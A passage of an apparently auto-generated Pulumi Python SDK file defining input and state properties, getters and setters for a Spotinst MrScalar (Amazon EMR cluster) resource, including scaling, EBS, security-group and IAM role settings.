pulumi.set(__self__, "name", name)
if provisioning_timeout is not None:
pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
if region is not None:
pulumi.set(__self__, "region", region)
if release_label is not None:
pulumi.set(__self__, "release_label", release_label)
if repo_upgrade_on_boot is not None:
pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_config is not None:
pulumi.set(__self__, "security_config", security_config)
if service_access_security_group is not None:
pulumi.set(__self__, "service_access_security_group", service_access_security_group)
if service_role is not None:
pulumi.set(__self__, "service_role", service_role)
if steps_files is not None:
pulumi.set(__self__, "steps_files", steps_files)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if task_desired_capacity is not None:
pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
if task_ebs_block_devices is not None:
pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
if task_ebs_optimized is not None:
pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
if task_instance_types is not None:
pulumi.set(__self__, "task_instance_types", task_instance_types)
if task_lifecycle is not None:
pulumi.set(__self__, "task_lifecycle", task_lifecycle)
if task_max_size is not None:
pulumi.set(__self__, "task_max_size", task_max_size)
if task_min_size is not None:
pulumi.set(__self__, "task_min_size", task_min_size)
if task_scaling_down_policies is not None:
pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
if task_scaling_up_policies is not None:
pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
if task_unit is not None:
pulumi.set(__self__, "task_unit", task_unit)
if termination_policies is not None:
pulumi.set(__self__, "termination_policies", termination_policies)
if termination_protected is not None:
pulumi.set(__self__, "termination_protected", termination_protected)
if visible_to_all_users is not None:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
if visible_to_all_users is not None:
pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter
def strategy(self) -> pulumi.Input[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: pulumi.Input[str]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
    """
    Up-scaling policies for the core group (list of `MrScalarCoreScalingUpPolicyArgs`).
    """
    return pulumi.get(self, "core_scaling_up_policies")

@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
    pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
    """Unit for target/min/max of the group: `instance` (amount of instances) or `weight` (amount of vCPU)."""
    current = pulumi.get(self, "core_unit")
    return current

@core_unit.setter
def core_unit(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "core_unit", new_value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
    """The ID of a custom Amazon EBS-backed Linux AMI, when the cluster uses a custom AMI."""
    current = pulumi.get(self, "custom_ami_id")
    return current

@custom_ami_id.setter
def custom_ami_id(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "custom_ami_id", new_value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
    """The MrScaler description."""
    current = pulumi.get(self, "description")
    return current

@description.setter
def description(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "description", new_value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
    """
    Size of the EBS root device volume.
    NOTE(review): units are not documented here — presumably GiB; confirm with provider docs.
    """
    return pulumi.get(self, "ebs_root_volume_size")

@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
    """Name of an Amazon EC2 key pair usable to ssh to the master node."""
    current = pulumi.get(self, "ec2_key_name")
    return current

@ec2_key_name.setter
def ec2_key_name(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "ec2_key_name", new_value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
    """Allow the `cluster_id` to set a provider output variable."""
    current = pulumi.get(self, "expose_cluster_id")
    return current

@expose_cluster_id.setter
def expose_cluster_id(self, new_value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "expose_cluster_id", new_value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
    """Describes the instances and their weights. See the Elastigroup Weighted Instances docs for details."""
    current = pulumi.get(self, "instance_weights")
    return current

@instance_weights.setter
def instance_weights(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
    pulumi.set(self, "instance_weights", new_value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
    """IAM role specified at job-flow launch; the job flow's EC2 instances assume this role."""
    current = pulumi.get(self, "job_flow_role")
    return current

@job_flow_role.setter
def job_flow_role(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "job_flow_role", new_value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
    """Whether the cluster should remain available after completing all steps."""
    current = pulumi.get(self, "keep_job_flow_alive")
    return current

@keep_job_flow_alive.setter
def keep_job_flow_alive(self, new_value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "keep_job_flow_alive", new_value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
    """Path to the Amazon S3 location where logs for this cluster are stored."""
    current = pulumi.get(self, "log_uri")
    return current

@log_uri.setter
def log_uri(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "log_uri", new_value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
    """EMR managed security group applied to the primary instance group."""
    current = pulumi.get(self, "managed_primary_security_group")
    return current

@managed_primary_security_group.setter
def managed_primary_security_group(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "managed_primary_security_group", new_value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
    """EMR managed security group applied to the replica instance group."""
    current = pulumi.get(self, "managed_replica_security_group")
    return current

@managed_replica_security_group.setter
def managed_replica_security_group(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "managed_replica_security_group", new_value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
    """EBS configuration for master group instances. Only a single block is allowed."""
    current = pulumi.get(self, "master_ebs_block_devices")
    return current

@master_ebs_block_devices.setter
def master_ebs_block_devices(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
    pulumi.set(self, "master_ebs_block_devices", new_value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
    """EBS optimization setting for instances in the group."""
    current = pulumi.get(self, "master_ebs_optimized")
    return current

@master_ebs_optimized.setter
def master_ebs_optimized(self, new_value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "master_ebs_optimized", new_value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """The MrScaler instance types for the master nodes."""
    current = pulumi.get(self, "master_instance_types")
    return current

@master_instance_types.setter
def master_instance_types(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    pulumi.set(self, "master_instance_types", new_value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
    """The MrScaler lifecycle for instances in the master group. Allowed values: 'SPOT', 'ON_DEMAND'."""
    current = pulumi.get(self, "master_lifecycle")
    return current

@master_lifecycle.setter
def master_lifecycle(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "master_lifecycle", new_value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
    """Number of instances in the master group."""
    current = pulumi.get(self, "master_target")
    return current

@master_target.setter
def master_target(self, new_value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "master_target", new_value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """The application name."""
    current = pulumi.get(self, "name")
    return current

@name.setter
def name(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "name", new_value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
    """
    Provisioning timeout configuration block (`MrScalarProvisioningTimeoutArgs`).
    """
    return pulumi.get(self, "provisioning_timeout")

@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
    pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
    """The MrScaler region."""
    current = pulumi.get(self, "region")
    return current

@region.setter
def region(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "region", new_value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
    """
    The release label for the cluster (maps to `releaseLabel`).
    NOTE(review): presumably the EMR release label (e.g. "emr-5.x.x") — confirm with provider docs.
    """
    return pulumi.get(self, "release_label")

@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
    """
    Applies only when `custom_ami_id` is used. Type of updates applied from the
    Amazon Linux AMI package repositories when an instance boots using the AMI.
    Possible values: `SECURITY`, `NONE`.
    """
    current = pulumi.get(self, "repo_upgrade_on_boot")
    return current

@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "repo_upgrade_on_boot", new_value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
    """Maximum number of retries of a capacity provisioning when the provisioning timeout is exceeded. Valid values: `1-5`."""
    current = pulumi.get(self, "retries")
    return current

@retries.setter
def retries(self, new_value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "retries", new_value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
    """An array of scheduled tasks."""
    current = pulumi.get(self, "scheduled_tasks")
    return current

@scheduled_tasks.setter
def scheduled_tasks(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
    pulumi.set(self, "scheduled_tasks", new_value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
    """Name of the security configuration applied to the cluster."""
    current = pulumi.get(self, "security_config")
    return current

@security_config.setter
def security_config(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "security_config", new_value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
    """Identifier of the EC2 security group for the EMR service to access clusters in VPC private subnets."""
    current = pulumi.get(self, "service_access_security_group")
    return current

@service_access_security_group.setter
def service_access_security_group(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "service_access_security_group", new_value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
    """IAM role assumed by the Amazon EMR service to access AWS resources on your behalf."""
    current = pulumi.get(self, "service_role")
    return current

@service_role.setter
def service_role(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "service_role", new_value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
    """Steps from S3."""
    current = pulumi.get(self, "steps_files")
    return current

@steps_files.setter
def steps_files(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
    pulumi.set(self, "steps_files", new_value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
    """A list of tags to assign to the resource. Multiple tags may be defined."""
    current = pulumi.get(self, "tags")
    return current

@tags.setter
def tags(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
    pulumi.set(self, "tags", new_value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
    """Amount of instances in the task group."""
    current = pulumi.get(self, "task_desired_capacity")
    return current

@task_desired_capacity.setter
def task_desired_capacity(self, new_value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "task_desired_capacity", new_value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
    """EBS configuration for task group instances. Only a single block is allowed."""
    current = pulumi.get(self, "task_ebs_block_devices")
    return current

@task_ebs_block_devices.setter
def task_ebs_block_devices(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
    pulumi.set(self, "task_ebs_block_devices", new_value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
    """EBS optimization setting for instances in the group."""
    current = pulumi.get(self, "task_ebs_optimized")
    return current

@task_ebs_optimized.setter
def task_ebs_optimized(self, new_value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "task_ebs_optimized", new_value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """The MrScaler instance types for the task nodes."""
    current = pulumi.get(self, "task_instance_types")
    return current

@task_instance_types.setter
def task_instance_types(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    pulumi.set(self, "task_instance_types", new_value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
    """The MrScaler lifecycle for instances in the task group. Allowed values: 'SPOT', 'ON_DEMAND'."""
    current = pulumi.get(self, "task_lifecycle")
    return current

@task_lifecycle.setter
def task_lifecycle(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "task_lifecycle", new_value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
    """Maximal amount of instances in the task group."""
    current = pulumi.get(self, "task_max_size")
    return current

@task_max_size.setter
def task_max_size(self, new_value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "task_max_size", new_value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
    """The minimal amount of instances in the task group."""
    current = pulumi.get(self, "task_min_size")
    return current

@task_min_size.setter
def task_min_size(self, new_value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "task_min_size", new_value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
    """
    Down-scaling policies for the task group (list of `MrScalarTaskScalingDownPolicyArgs`).
    """
    return pulumi.get(self, "task_scaling_down_policies")

@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
    pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
    """
    Up-scaling policies for the task group (list of `MrScalarTaskScalingUpPolicyArgs`).
    """
    return pulumi.get(self, "task_scaling_up_policies")

@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
    pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
    """Unit for target/min/max of the task group: `instance` (amount of instances) or `weight` (amount of vCPU)."""
    current = pulumi.get(self, "task_unit")
    return current

@task_unit.setter
def task_unit(self, new_value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "task_unit", new_value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
    """Allows defining termination policies for EMR clusters based on CloudWatch Metrics."""
    current = pulumi.get(self, "termination_policies")
    return current

@termination_policies.setter
def termination_policies(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
    pulumi.set(self, "termination_policies", new_value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether the cluster's EC2 instances are protected from termination by API calls,
    user intervention, or a job-flow error.
    """
    current = pulumi.get(self, "termination_protected")
    return current

@termination_protected.setter
def termination_protected(self, new_value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "termination_protected", new_value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
    """
    Visibility flag for the cluster.
    NOTE(review): the companion state class warns this field "has been removed from
    our API and is no longer functional" — likely deprecated here too; confirm.
    """
    return pulumi.get(self, "visible_to_all_users")

@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "visible_to_all_users", value)
@pulumi.input_type
class _MrScalarState:
def __init__(__self__, *,
             additional_info: Optional[pulumi.Input[str]] = None,
             additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
             availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
             cluster_id: Optional[pulumi.Input[str]] = None,
             configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
             core_desired_capacity: Optional[pulumi.Input[int]] = None,
             core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
             core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             core_lifecycle: Optional[pulumi.Input[str]] = None,
             core_max_size: Optional[pulumi.Input[int]] = None,
             core_min_size: Optional[pulumi.Input[int]] = None,
             core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
             core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
             core_unit: Optional[pulumi.Input[str]] = None,
             custom_ami_id: Optional[pulumi.Input[str]] = None,
             description: Optional[pulumi.Input[str]] = None,
             ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
             ec2_key_name: Optional[pulumi.Input[str]] = None,
             expose_cluster_id: Optional[pulumi.Input[bool]] = None,
             instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
             job_flow_role: Optional[pulumi.Input[str]] = None,
             keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
             log_uri: Optional[pulumi.Input[str]] = None,
             managed_primary_security_group: Optional[pulumi.Input[str]] = None,
             managed_replica_security_group: Optional[pulumi.Input[str]] = None,
             master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
             master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             master_lifecycle: Optional[pulumi.Input[str]] = None,
             master_target: Optional[pulumi.Input[int]] = None,
             name: Optional[pulumi.Input[str]] = None,
             output_cluster_id: Optional[pulumi.Input[str]] = None,
             provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
             region: Optional[pulumi.Input[str]] = None,
             release_label: Optional[pulumi.Input[str]] = None,
             repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
             retries: Optional[pulumi.Input[int]] = None,
             scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
             security_config: Optional[pulumi.Input[str]] = None,
             service_access_security_group: Optional[pulumi.Input[str]] = None,
             service_role: Optional[pulumi.Input[str]] = None,
             steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
             strategy: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
             task_desired_capacity: Optional[pulumi.Input[int]] = None,
             task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
             task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             task_lifecycle: Optional[pulumi.Input[str]] = None,
             task_max_size: Optional[pulumi.Input[int]] = None,
             task_min_size: Optional[pulumi.Input[int]] = None,
             task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
             task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
             task_unit: Optional[pulumi.Input[str]] = None,
             termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
             termination_protected: Optional[pulumi.Input[bool]] = None,
             visible_to_all_users: Optional[pulumi.Input[bool]] = None):
    """
    Input properties used for looking up and filtering MrScalar resources.

    :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
